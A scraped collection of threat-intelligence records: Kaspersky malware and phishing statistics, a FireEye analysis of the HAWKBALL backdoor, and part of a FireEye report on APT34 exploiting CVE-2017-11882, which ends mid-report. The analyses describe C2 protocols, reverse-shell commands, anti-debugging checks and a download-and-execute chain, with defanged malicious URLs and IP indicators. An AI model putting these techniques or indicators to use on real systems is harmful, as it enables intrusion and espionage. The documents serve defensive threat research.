includes only **Malware-class** attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "modified": "2018-05-14T10:00:30", "published": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "type": "securelist", "title": "IT threat evolution Q1 2018. Statistics", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-26T10:27:00", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882"], "description": "\n\n## Quarterly highlights\n\n### Amazon Prime\n\nIn Q3, we registered numerous scam mailings related to Amazon Prime. Most of the phishing emails with a link to a fake Amazon login page offered new prices or rewards for buying things, or reported problems with membership, etc. Against the backdrop of September's Prime Day sale, such messages were plausible.\n\nScammers also used another fraudulent scheme: An email informed victims that their request to cancel Amazon Prime had been accepted, but if they had changed their mind, they should call the number in the message. 
Fearing their accounts may have been hacked, victims phoned the number \u2014 this was either premium-rate and expensive, or, worse, during the call the scammers tricked them into revealing confidential data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165224/spam-report-q3-2019-1.png>)\n\n### Scammers collect photos of documents and selfies\n\nThis quarter we detected a surge in fraud related to stealing photos of documents and selfies with them (often required for registration or identification purposes). In phishing emails seemingly from payment systems and banks, users were asked under various pretexts to confirm their identity by going to a special page and uploading a selfie with an ID document. The fake sites looked quite believable, and provided a list of necessary documents with format requirements, links to privacy policy, user agreement, etc.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165613/spam-report-q3-2019-2.png>)\n\nSome scammers even managed without a fake website. For instance, in summer Italian users were hit by a spam attack involving emails about a smartphone giveaway. To receive the prize, hopefuls had to send a photograph of an ID document and a selfie to the specified email address. To encourage victims to respond, the scammers stated that the offer would soon expire.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165142/spam-report-q3-2019-3.png>)\n\nTo obtain copies of documents, scammers also sent fake Facebook messages in which recipients were informed that access to their accounts had been restricted due to complaints about the content of some posts. 
To prevent their account from being deleted, they were instructed to send a photo or scan of a driving license and other ID documents with a selfie, plus medical insurance details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165215/spam-report-q3-2019-4.png>)\n\n### YouTube and Instagram\n\nScammers continue to exploit traditional schemes on new platforms, and Q3 was a bumper quarter in this regard. For instance, YouTube [ads](<https://www.kaspersky.com/blog/youtube-phishing-scam/25600/>) appeared offering the viewer the chance to earn a lot of quick and easy money. The video explained to users that they had to take a survey and provide personal details, after which they would receive a payout or a gift from a large company, etc. To add credibility, fake reviews from supposedly \"satisfied customers\" were posted under the video. What's more, the enthusiastic bot-generated comments did not appear all in one go, but were added gradually to look like a live stream.\n\nAll the user had to do was follow the link under the video and then follow the steps in the video instructions. Sure, to receive the handout, a small \"commission fee\" or payment to \"confirm the account\" was required.\n\nSimilar schemes did the rounds on Instagram. Advertising posts in the name of various celebrities (fake accounts are easily distinguished from real ones by the absence of a blue tick) were often used to lure fans with prize draws or rewards for completing a paid survey. As with the YouTube videos, there were plenty of fake glowing comments under such posts. Given that such giveaways by stars are not uncommon, inattentive users could swallow the bait.\n\n### Back to school\n\nIn Q3, we registered a series of attacks related in one way or another to education. 
Phishers harvested usernames and passwords from the personal accounts of students and lecturers using fake pages mimicking university login pages.\n\nThe scammers were looking not for financial data, but for university research papers, as well as any personal information that might be kept on the servers. Data of this kind is in high demand on the darknet market. Even data that seems useless at first can be used by cybercriminals to prepare a targeted attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165645/spam-report-q3-2019-7.png>)\n\nOne way to create phishing pages is to hack into legitimate resources and post fraudulent content on them. In Q3, phishers hacked school websites and created fake pages on them to mimic login forms for commonly used resources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165749/spam-report-q3-2019-8.png>)\n\nScammers also tried to steal usernames and passwords for the mail servers of educational service providers. 
To do so, they mailed out phishing messages disguised as support service notifications asking recipients to confirm that the mail account belonged to them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165813/spam-report-q3-2019-9.png>)\n\n### Apple product launch\n\nIn September, Apple unveiled its latest round of products, and as usual the launch was followed by fans and scammers alike \u2014 we detected phishing emails in mail traffic aimed at stealing Apple ID authentication data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165908/spam-report-q3-2019-11.png>) \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25165950/spam-report-q3-2019-12.png>)\n\nScammers also harvested users' personal data by sending spam messages offering free testing of new releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170022/spam-report-q3-2019-13.png>)\n\nThe number of attempts to open fake websites mentioning the Apple brand rose in the runup to the unveiling of the new product line and peaked on the actual day itself:\n\n_Number of attempts to open Apple-related phishing pages, September 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170048/spam-report-q3-2019-14.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170120/spam-report-q3-2019-15.png>)\n\n### Attacks on pay TV users\n\nTo watch TV or record live broadcasts in the UK, a license fee is payable. This was exploited by spammers who sent out masses of fake license expiry/renewal messages. 
What's more, they often used standard templates saying that the license could not be renewed because the bank had declined the payment.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170140/spam-report-q3-2019-16.png>)\n\nThe recipient was then asked to verify (or update) their personal and/or payment details by clicking on a link pointing to a fake data entry and payment form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170208/spam-report-q3-2019-17.png>)\n\n### Spam through website feedback forms\n\nThe website of any large company generally has one or even several feedback forms. These can be used to ask questions, express wishes, sign up for company events, or subscribe to newsletters. But messages sent via such forms often come not only from clients or interested visitors, but from scammers too.\n\nThere is nothing new about this phenomenon _per se_, but it is interesting to observe how the mechanism for sending spam through forms has evolved. If previously spammers targeted company mailboxes linked to feedback forms, now fraudsters use them to send spam to people on the outside.\n\nThis is possible because some companies do not pay due attention to website security, allowing attackers to bypass simple CAPTCHA tests with the aid of scripts and to register users en masse using feedback forms. Another oversight is that the username field, for example, accepts any text or link. As a result, the victim whose mailing address was used receives a legitimate confirmation of registration email, but containing a message from the scammers. 
The company itself does not receive any message.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170237/spam-report-q3-2019-18.png>)\n\nSuch spam started to surge several years ago, and has recently become even more popular \u2014 in Q3 services for delivering advertising messages through feedback forms began to be advertised in spam mailings.\n\n### Attacks on corporate email\n\nLast quarter, we observed a major spam campaign in which scammers sent emails pretending to be voicemail notifications. To listen to the supposed message, the recipient was invited to click or tap the (phishing) link that pointed to a website mimicking the login page of a popular Microsoft service. It was a page for signing either into Outlook or directly into a Microsoft account.\n\nThe attack was aimed specifically at corporate mail users, since various business software products allow the exchange of voice messages and inform users of new ones via email.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170256/spam-report-q3-2019-19.png>)\n\nIt is worth noting that the number of spam attacks aimed specifically at the corporate sector has increased significantly of late. Cybercriminals are after access to employees' email.\n\nAnother common trick is to report that incoming emails are stuck in the delivery queue. To receive these supposedly undeliverable messages, the victim is prompted to follow a link and enter their corporate account credentials on another fake login page, from where they go directly to the cybercriminals. 
Last quarter, our products blocked many large-scale spam campaigns under the guise of such notifications.\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Share of spam in global mail traffic, Q2 and Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170320/spam-report-q3-2019-20-en.png>)\n\nIn Q3 2019, the largest share of spam was recorded in August (57.78%). The average percentage of spam in global mail traffic was 56.26%, down 1.38 p.p. against the previous reporting period.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25170903/spam-report-q3-2019-22-en.png>)\n\nThe TOP 5 spam-source countries remain the same as last quarter, only their percentage shares are slightly different. China is in first place (20.43%), followed by the US (13.37%) and Russia (5.60%). Fourth position goes to Brazil (5.14%) and fifth to France (3.35%). Germany took sixth place (2.95%), followed \u2014 with a gap of less than 0.5 p.p. \u2014 by India (2.65%), Turkey (2.42%), Singapore (2.24%), and Vietnam (2.15%).\n\n### Spam email size\n\n_Spam email size, Q2 and Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25171700/spam-report-q3-2019-23.png>)\n\nIn Q3 2019, the share of very small emails (up to 2 KB) in spam decreased by 4.38 p.p. to 82.93%. The proportion of emails sized 5-10 KB grew slightly (by 1.52 p.p.) against the previous quarter to 3.79%.\n\nMeanwhile, the share of 10-20 KB emails climbed by 0.26 p.p. to 2.24%. As for the number of 20-50 KB emails, their share changed more significantly, increasing by 2.64 p.p. 
(up to 4.74%) compared with the previous reporting period.\n\n### Malicious attachments in email\n\n_Number of Mail Anti-Virus triggerings, Q2 2019 - Q3 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25171804/spam-report-q3-2019-24-en.png>)\n\nIn Q3 2019, our security solutions detected a total of 48,089,352 malicious email attachments, which is almost five million more than in Q2. July was the most active month with 17 million Mail Anti-Virus triggerings, while August was the \"calmest\" \u2014 with two million fewer.\n\n_TOP 10 malicious attachments in mail traffic, Q3 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25172343/spam-report-q3-2019-25.png>)\n\nIn Q3, first place by prevalence in mail traffic went to the Office malware Exploit.MSOffice.CVE-2017-11882.gen (7.13%); in second place was the Worm.Win32.WBVB.vam worm (4.13%), and in third was another malware aimed at Microsoft Office users, Trojan.MSOffice.SAgent.gen (2.24%).\n\n_TOP 10 malware families, Q3 2019 (download)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25171905/spam-report-q3-2019-26.png>)\n\nAs for malware families, the Backdoor.Win32.Androm family (7.49%) claimed first place.\n\nIn second place are Microsoft Office exploits from the Exploit.MSOffice.CVE-2017-11882.gen family (7.20%). And in third is Worm.Win32.WBVB.vam (4.60%).\n\n### Countries targeted by malicious mailings\n\n_Distribution of Mail Anti-Virus triggerings by country, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25171931/spam-report-q3-2019-27-en.png>)\n\nFirst place by number of Mail Anti-Virus triggerings in Q3 2019 was retained by Germany. Its score increased by 0.31 p.p. to 10.36%. 
Vietnam also remained in the TOP 3, rising to second position (5.92%), and Brazil came in third just a tiny fraction behind.\n\n## Statistics: phishing\n\nIn Q3 2019, the Anti-Phishing system prevented **105,220,094** attempts to direct users to scam websites. The percentage of unique attacked users was 11.28% of the total number of users of Kaspersky products worldwide.\n\n### Attack geography\n\nThe country with the largest share of users attacked by phishers in Q3 2019 was Venezuela (30.96%), which took second place in the previous quarter and has since added 5.29 p.p.\n\n_Geography of phishing attacks, Q3 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25172232/spam-report-q3-2019-28-en.png>)\n\nHaving lost 3.53 p.p., Greece ranked second (22.67%). Third place, as in the last quarter, went to Brazil (19.70%).\n\n**Country** | **%*** \n---|--- \nVenezuela | 30.96 \nGreece | 22.67 \nBrazil | 19.70 \nHonduras | 17.58 \nGuatemala | 16.80 \nPanama | 16.70 \nAustralia | 16.18 \nChile | 15.98 \nEcuador | 15.64 \nPortugal | 15.61 \n \n_* Share of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country_\n\n### Organizations under attack\n\n_The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nFor the first time this year, the share of attacks on organizations in the Global Internet Portals category (23.81%) exceeded the share of attacks on credit organizations (22.46%). Social networks (20.48%) took third place, adding 11.40 p.p. 
to its share.\n\n_Distribution of organizations subjected to phishing attacks by category, Q3 2019._[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/11/25172404/spam-report-q3-2019-29-en.png>)\n\nIn addition, the TOP 10 said goodbye to the Government and Taxes category.\n\nIts place was taken by the Financial Services category, which unites companies providing services in the field of finance that are not included in the Banks or Payment Systems categories, which cover providers of insurance, leasing, brokerage, and other services.\n\n## Conclusion\n\nThe average share of spam in global mail traffic (56.26%) this quarter decreased by 1.38 p.p. against the previous reporting period, while the number of attempted redirects to phishing pages compared to Q2 2019 fell by 25 million to just over 105 million.\n\nTop in this quarter's list of spam-source countries is China, with a share of 20.43%. Our security solutions blocked 48,089,352 malicious mail attachments, while Backdoor.Win32.Androm became the most common mail-based malware family \u2014 its share of mail traffic amounted to 7.49%.", "modified": "2019-11-26T10:00:16", "published": "2019-11-26T10:00:16", "id": "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "href": "https://securelist.com/spam-report-q3-2019/95177/", "type": "securelist", "title": "Spam and phishing in Q3 2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2020-11-23T02:06:52", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "description": "FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.\n\nHAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. 
HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.

Figure 1 shows the decoy used in the attack.

Figure 1: Decoy used in attack

The decoy file, doc.rtf (MD5: AC0EAC22CE12EAC9EE15CA03646ED70C), contains an OLE object that uses Equation Editor to drop the embedded shellcode in %TEMP% with the name 8.t. This shellcode is decrypted in memory by EQNEDT32.EXE. Figure 2 shows the decryption mechanism used in EQNEDT32.EXE.

Figure 2: Shellcode decryption routine

The decrypted shellcode is dropped as a Microsoft Word plugin WLL (MD5: D90E45FBF11B5BBDCA945B24D155A4B2) into C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP (Figure 3).

Figure 3: Payload dropped as Word plugin

#### Technical Details

DllMain of the dropped payload determines whether the string WORD.EXE is present in the sample's command line. If the string is not present, the malware exits. If the string is present, the malware executes the command RunDll32.exe <C:\Users\ADMINI~1\AppData\Roaming\Microsoft\Word\STARTUP\hh14980443.wll, DllEntry> using the WinExec() function.

DllEntry is the payload's only export function. The malware creates a log file in %TEMP% with the name c3E57B.tmp. On every write, the malware records the current local time plus two hardcoded values in the following format:

<Month int>/<Date int> <Hours>:<Minutes>:<Seconds>\t<Hardcoded Digit>\t<Hardcoded Digit>\n

Example:

05/22 07:29:17 4 0

This log file is written to every 15 seconds. The last two digits are hard coded and passed as parameters to the function (Figure 4).

Figure 4: String format for log file

The encrypted file contains a config file of 0x78 bytes. The data is decrypted with a 0xD9 XOR operation. The decrypted data contains command and control (C2) information as well as a mutex string used during malware initialization. Figure 5 shows the decryption routine and the decrypted config file.

Figure 5: Config decryption routine

The IP address from the config file is written to %TEMP%/3E57B.tmp with the current local time. For example:

05/22 07:49:48 149.28.182.78.

#### Mutex Creation

The malware creates a mutex to prevent multiple instances of execution. Before naming the mutex, the malware determines whether it is running as a system profile (Figure 6). To verify this, the malware resolves the environment variable %APPDATA% and checks it for the string **config/systemprofile**.

Figure 6: Verify whether malware is running as a system profile

If the malware is running as a system profile, the string **d0c** from the decrypted config file is used to create the mutex. Otherwise, the string **_cu** is appended to **d0c** and the mutex is named **d0c_cu** (Figure 7).

Figure 7: Mutex creation

After the mutex is created, the malware writes another entry in the log file in %TEMP% with the values 32 and 0.

#### Network Communication

HAWKBALL is a backdoor that communicates with a single hard-coded C2 server using HTTP. The C2 server is obtained from the decrypted config file, as shown in Figure 5. The network request is formed with hard-coded values such as the User-Agent. The malware also sets other request header fields such as:

 * Content-Length: <content_length>
 * Cache-Control: no-cache
 * Connection: close

The malware sends an HTTP GET request to its C2 IP address using HTTP over port 443. Figure 8 shows the GET request sent over the network.

Figure 8: Network request

The network request is formed with four parameters in the format shown in Figure 9.

**Format = "?t=%d&&s=%d&&p=%s&&k=%d"**

Figure 9: GET request parameters formation

Table 1 shows the GET request parameters.

| Value | Information |
|---|---|
| t | Initially set to 0 |
| s | Initially set to 0 |
| p | String from decrypted config at 0x68 |
| k | The result of GetTickCount() |

Table 1: GET request parameters

If the returned response is 200, the malware sends another GET request (Figure 10) with the following parameters (Figure 11).

**Format = "?e=%d&&t=%d&&k=%d"**

Figure 10: Second GET request

Figure 11: Second GET request parameters formation

Table 2 shows information about the parameters.

| Value | Information |
|---|---|
| e | Initially set to 0 |
| t | Initially set to 0 |
| k | The result of GetTickCount() |

Table 2: Second GET request parameters

If the returned response is 200, the malware examines the Set-Cookie field. This field provides the Command ID. As shown in Figure 10, the Set-Cookie field responds with ID=17.

This Command ID acts as the index into a function table created by the malware. Figure 12 shows the creation of the virtual function table that will perform the backdoor's command.

Figure 12: Function table

Table 3 shows the commands supported by HAWKBALL.

| Command | Operation Performed |
|---|---|
| 0 | Set URI query string to value |
| 16 | Unknown |
| 17 | Collect system information |
| 18 | Execute a provided argument using CreateProcess |
| 19 | Execute a provided argument using CreateProcess and upload output |
| 20 | Create a cmd.exe reverse shell, execute a command, and upload output |
| 21 | Shut down reverse shell |
| 22 | Unknown |
| 23 | Shut down reverse shell |
| 48 | Download file |
| 64 | Get drive geometry and free space for logical drives C-Z |
| 65 | Retrieve information about provided directory |
| 66 | Delete file |
| 67 | Move file |

Table 3: HAWKBALL commands

#### Collect System Information

Command ID 17 indexes to a function that collects the system information and sends it to the C2 server. The system information includes:

 * Computer Name
 * User Name
 * IP Address
 * Active Code Page
 * OEM Code Page
 * OS Version
 * Architecture Details (x32/x64)
 * String at 0x68 offset from decrypted config file

This information is retrieved from the victim using the following WINAPI calls and assembled with the format string below:

**Format = "%s;%s;%s;%d;%d;%s;%s %dbit"**

 * GetComputerNameA
 * GetUserNameA
 * gethostbyname and inet_ntoa
 * GetACP
 * GetOEMCP
 * GetCurrentProcess and IsWow64Process

Figure 13: System information

The collected system information is concatenated together with a semicolon separating each field:

WIN732BIT-L-0;Administrator;10.128.62.115;1252;437;d0c;Windows 7 32bit

This information is encrypted using an XOR operation. The response from the second GET request is used as the encryption key. As shown in Figure 10, the second GET request responds with a 4-byte XOR key. In this case the key is **0xE5044C18**.

Once encrypted, the system information is sent in the body of an HTTP POST. Figure 14 shows the data sent over the network with the POST request.

Figure 14: POST request

In the request header, the field **Cookie** is set with the command ID of the command for which the response is sent. As shown in Figure 14, the Cookie field is set with ID=17, which is the response for the previous command. In the received response, the next command is returned in the Set-Cookie field.

Table 4 shows the parameters of this POST request.

| Parameter | Information |
|---|---|
| e | Initially set to 0 |
| t | Decimal form of the little-endian XOR key |
| k | The result of GetTickCount() |

Table 4: POST request parameters

##### Create Process

The malware creates a process with the specified arguments. Figure 15 shows the operation.

Figure 15: Command create process

##### Delete File

The malware deletes the file specified as an argument. Figure 16 shows the operation.

Figure 16: Delete file operation

##### Get Directory Information

The malware gets information for the provided directory using the following WINAPI calls:

 * FindFirstFileW
 * FindNextFileW
 * FileTimeToLocalFileTime
 * FileTimeToSystemTime

Figure 17 shows the APIs used for collecting the information.

Figure 17: Get directory information

##### Get Disk Information

This command retrieves the drive information for drives C through Z along with the available disk space for each drive.

Figure 18: Retrieve drive information

The information is stored in the following format for each drive:

**Format = "%d+%d+%d+%d;"**

Example: "8+512+6460870+16751103;"

The information for all the available drives is combined and sent to the server using an operation similar to Figure 14.

#### Anti-Debugging Tricks

##### Debugger Detection With PEB

The malware queries the value of the BeingDebugged flag in the PEB to check whether the process is being debugged.

Figure 19: Retrieve value from PEB

##### NtQueryInformationProcess

The malware uses the NtQueryInformationProcess API to detect whether it is being debugged. The following flags are used:

 * Passing value 0x7 to ProcessInformationClass:

Figure 20: ProcessDebugPort verification

 * Passing value 0x1E to ProcessInformationClass:

Figure 21: ProcessDebugFlags verification

 * Passing value 0x1F to ProcessInformationClass:

Figure 22: ProcessDebugObject

#### Conclusion

HAWKBALL is a new backdoor that provides features attackers can use to collect information from a victim and deliver new payloads to the target. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We advise that all industries remain on alert, though, because the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

#### Indicators of Compromise (IOC)

| MD5 | Name |
|---|---|
| AC0EAC22CE12EAC9EE15CA03646ED70C | Doc.rtf |
| D90E45FBF11B5BBDCA945B24D155A4B2 | hh14980443.wll |

#### Network Indicators

 * 149.28.182[.]78:443
 * 149.28.182[.]78:80
 * http://149.28.182[.]78/?t=0&&s=0&&p=wGH^69&&k=<tick_count>
 * http://149.28.182[.]78/?e=0&&t=0&&k=<tick_count>
 * http://149.28.182[.]78/?e=0&&t=<int_xor_key>&&k=<tick_count>
 * Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)

#### FireEye Detections

| MD5 | Product | Signature | Action |
|---|---|---|---|
| AC0EAC22CE12EAC9EE15CA03646ED70C | FireEye Email Security, FireEye Network Security, FireEye Endpoint Security | FE_Exploit_RTF_EQGEN_7, Exploit.Generic.MVX | Block |
| D90E45FBF11B5BBDCA945B24D155A4B2 | FireEye Email Security, FireEye Network Security, FireEye Endpoint Security | Malware.Binary.Dll, FE_APT_Backdoor_Win32_HawkBall_1, APT.Backdoor.Win.HawkBall | Block |

#### Acknowledgement

Thank you to Matt Williams for providing reverse engineering support.

Source: FireEye Threat Research, "Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities", published 2019-06-05, https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html (record FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD; CVSS 9.3, AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVEs: CVE-2017-11882, CVE-2017-0199

Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.

We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.

APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).

In this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.

The full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group "OilRig"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.

#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability

CVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.

The vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office that is used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology. It is created as a separate process instead of as a child process of the Office applications. If a crafted formula is passed to the Equation Editor, it does not check the data length properly while copying the data, which results in stack memory corruption. As EQNEDT32.exe is compiled using an older compiler and does not support address space layout randomization (ASLR), a technique that guards against the exploitation of memory corruption vulnerabilities, the attacker can easily alter the flow of program execution.

#### Analysis

APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a spear phishing email sent to the victim organization. The malicious file exploits CVE-2017-11882, which corrupts the memory on the stack and then proceeds to push the malicious data to the stack. The malware then overwrites the function address with the address of an existing instruction from EQNEDT32.EXE. The overwritten instruction (displayed in Figure 1), at address 00430c12, calls the "WinExec" function from kernel32.dll.

Figure 1: Disassembly of overwritten function address

After exploitation, the "WinExec" function is successfully called to create a child process, "mshta.exe", in the context of the currently logged-on user. The process "mshta.exe" downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.

Figure 2: Attacker data copied to corrupt stack buffer

#### Execution Workflow

The malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.

Figure 3: CVE-2017-11882 and POWRUNER attack sequence

 1. The malicious .rtf file exploits CVE-2017-11882.
 2. The malware overwrites the function address with an existing instruction from EQNEDT32.EXE.
 3. The malware creates a child process, "mshta.exe," which downloads a file from: hxxp://mumbai-m[.]site/b.txt.
 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.
 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\ProgramData\Windows\Microsoft\java\
 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.
 7. cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.
 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.
 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.

Figure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.

Figure 4: Execution Workflow Section of v.vbs

After successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are the final stage payloads: they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities.

#### hUpdateCheckers.ps1 (POWRUNER)

The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.

Figure 5: POWRUNER PowerShell script hUpdateCheckers.ps1

